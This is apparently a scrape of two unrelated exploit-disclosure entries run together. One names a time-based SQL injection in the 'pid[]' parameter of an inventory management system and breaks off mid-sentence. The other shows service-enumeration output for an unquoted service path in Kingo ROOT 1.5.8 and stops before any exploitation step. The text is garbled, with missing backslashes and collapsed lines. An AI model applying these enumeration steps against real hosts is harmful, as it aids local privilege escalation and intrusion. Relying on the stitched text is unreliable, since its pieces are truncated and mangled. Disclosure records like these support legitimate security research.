# Exploit Title: Free and Open Source Inventory Management System 1.0 - Unauthenticated SQL Injection# Exploit Author: Sefa Ozan# Date: 16/09/2023# Vendor: MAYURIK# Vendor Homepage: https://mayurik.com/# Software Link: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html# Tested on: Windows 10 Pro & Ubuntu 22.04## Description:The `pid[]` parameter is vulnerable to Time Based SQL injection attacks. To prove the existence of the vulnerability,
#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path#Date: 8/22/2023#Exploit Author: Anish Feroz (ZEROXINN)#Vendor Homepage: https://www.kingoapp.com/#Software Link: https://www.kingoapp.com/android-root/download.htm#Version: 1.5.8.3353#Tested on: Windows 10 Pro -Discovering Unquoted Path C:UsersAnish>sc qc KingoSoftService[SC] QueryServiceConfig SUCCESSSERVICE NAME: KingoSoftServiceTYPE : 110 WIN32 OWN PROCESS (interactive)START TYPE : 2 AUTO STARTERROR CONTROL : 1 NORMALBINARY PATH NAME : C:UsersUsmanAppDataLocalKingosoftKingo Rootupdate 27205binKingoSoftService.exeLOAD ORDER GROUP :TAG : 0DISPLAY NAME : KingoSoftServiceDEPENDENCIES :SERVICE START NAME : LocalSystemC:UsersAnish>systeminfoHost Name: DESKTOP-UT7E7CFOS Name: Microsoft